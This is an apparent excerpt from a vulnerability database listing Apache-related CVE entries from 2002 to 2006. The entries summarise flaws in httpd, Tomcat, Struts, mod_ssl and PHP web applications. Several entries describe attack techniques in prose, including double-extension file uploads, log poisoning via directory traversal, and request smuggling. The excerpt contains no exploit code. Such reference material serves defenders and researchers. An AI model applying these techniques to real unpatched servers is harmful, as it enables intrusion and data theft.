9052| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
9053| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
9054| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
9055| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
9056| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
9057| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
9058| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
9059| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
9060| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
9061| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
9062| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
9063| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
9064| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
9065| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
9066| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
9067| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
9068| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
9069| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
9070| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
9071| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
9072| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
9073| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
9074| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
9075| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
9076| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
9077| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
9078| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
9079| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
9080| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
9081| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
9082| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
9083| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
9084| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
9085| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
9086| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
9087| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
9088| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
9089| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
9090| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
9091| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
9092| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
9093| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
9094| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
9095| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
9096| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
9097| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
9098| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
9099| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
9100| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
9101| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
9102| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
9103| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
9104| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
9105| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
9106| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
9107| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
9108| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
9109| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
9110| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
9111| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
9112| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
9113| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
9114| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
9115| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
9116| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
9117| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
9118| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
9119| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
9120| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
9121| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
9122| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
9123| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
9124| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
9125| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
9126| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
9127| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
9128| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
9129| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
9130| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
9131| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
9132| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
9133| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
9134| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
9135| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
9136| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
9137| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
9138| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
9139| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
9140| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
9141| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
9142| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
9143| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
9144| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
9145| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
9146| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
9147| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
9148| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
9149| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
9150| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
9151| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
9152| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
9153| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
9154| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
9155| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
9156| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
9157| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
9158| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
9159| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
9160| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
9161| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
9162| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to bypass intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
9163| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
9164| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
9165| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
9166| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
9167| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
9168| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 do not filter terminal escape sequences from their access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
9169| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
9170| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
9171| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
9172| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
9173| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
9174| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
9175| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
9176| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
9177| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
9178| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
9179| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
9180| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allow remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
9181| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
9182| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
9183| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
9184| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
9185| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
